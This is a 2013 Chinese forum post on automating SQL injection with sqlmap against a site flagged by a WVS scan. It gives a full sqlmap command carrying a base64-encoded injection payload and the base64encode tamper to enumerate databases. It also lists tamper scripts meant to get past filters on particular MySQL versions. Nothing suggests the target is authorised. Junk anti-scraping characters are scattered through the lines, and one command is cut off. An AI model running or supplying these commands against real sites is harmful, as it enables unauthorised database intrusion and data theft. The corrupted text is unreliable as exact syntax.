WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
9 V d! f- S7 J/ C
1 @% @ S) W$ [; B. [5 Zsqlmap的tamper里有个base64encode.py
+ E" M5 @3 l4 V5 f( f$ d$ p0 d7 I
使用如下9 S* y) B- w4 N, S4 W7 J
/ |: v. M7 n, s Ksqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
( G5 }5 p( @0 K7 j( b, t9 M* f, s: \ R
2 g: s4 A5 m m" Zsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
! I5 u- ~2 j5 o+ e7 ^/ j+ V, d
6 `# `9 c5 B! U; E6 c+ n其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
. z( f3 K- l) D% U$ b4 ^. B
t9 M/ x. o- l; W0 F; H# N: Xspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入9 K7 j8 ^# o7 v" Q: ~$ o
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入2 w0 _3 H4 B1 ?6 Z) D0 E D
首先确定目标数据库版本,然后选择相应的脚本。
3 V4 ^% b0 a0 t8 X: G) d q-v 3 --batch --tamper "space2hash.py"& N+ B+ z, x& C: G; z$ v( b
1 w. Z& w# L& O* b/ Q还有其他一些插件:
! D' |. j0 u- e+ G2 _5 C7 G+ xencodes编码 ——charencode.py1 w- p# _* w2 m f* T# N6 {
base64编码 —— base64encode.py
. N: U+ J! r2 J替换空格和关键字 —— halfversionedmorekeywords.py
$ @. ?* y$ E- N' V& _ |
$ j V9 |& R* R6 }3 ~, W1 [3 `
7 n& F h' N7 | Z4 @* x+ h' l! {( d3 K/ K
# x+ [+ A6 G! h. { |
发表于 2013-11-23 15:50:45
收藏
支持
反对